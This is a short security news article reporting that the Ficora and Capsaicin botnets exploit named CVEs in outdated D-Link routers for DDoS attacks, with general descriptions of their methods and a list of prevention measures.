Massive Botnet Campaign Targets Millions of Vulnerable D-Link Routers

Massive Botnet Campaign Targets Millions of Vulnerable D-Link Routers

D-Link Routers Under Attack by Ficora and Capsaicin Botnets

Two emerging botnets, Ficora and Capsaicin, are actively targeting vulnerable D-Link routers, particularly those that are outdated or have reached end-of-life status. Popular models under attack include DIR-645, DIR-806, GO-RT-AC750, and DIR-845L.

Attack Methodology
The malware exploits known vulnerabilities (CVE-2015-2051, CVE-2019-10891, CVE-2022-37056, and CVE-2024-33112) to compromise devices through D-Link’s HNAP management interface. Both botnets primarily focus on launching DDoS attacks.

Ficora Botnet
– A Mirai variant specifically targeting D-Link devices
– Shows widespread distribution, particularly in Japan and the United States
– Utilizes a ‘multi’ shell script for payload delivery
– Supports multiple hardware architectures
– Features brute force capabilities with hard-coded credentials
– Implements UDP flooding, TCP flooding, and DNS amplification attacks

Capsaicin Botnet
– A Kaiten variant developed by the Keksec group
– Primarily targets East Asian countries
– Uses “bins.sh” downloader script with ‘yakuza’ prefix binaries
– Eliminates competing botnet malware on infected devices
– Capable of information gathering and DDoS attacks

Prevention Measures
– Keep router firmware updated
– Replace end-of-life devices
– Use strong, unique passwords
– Disable unnecessary remote access features

Share This Article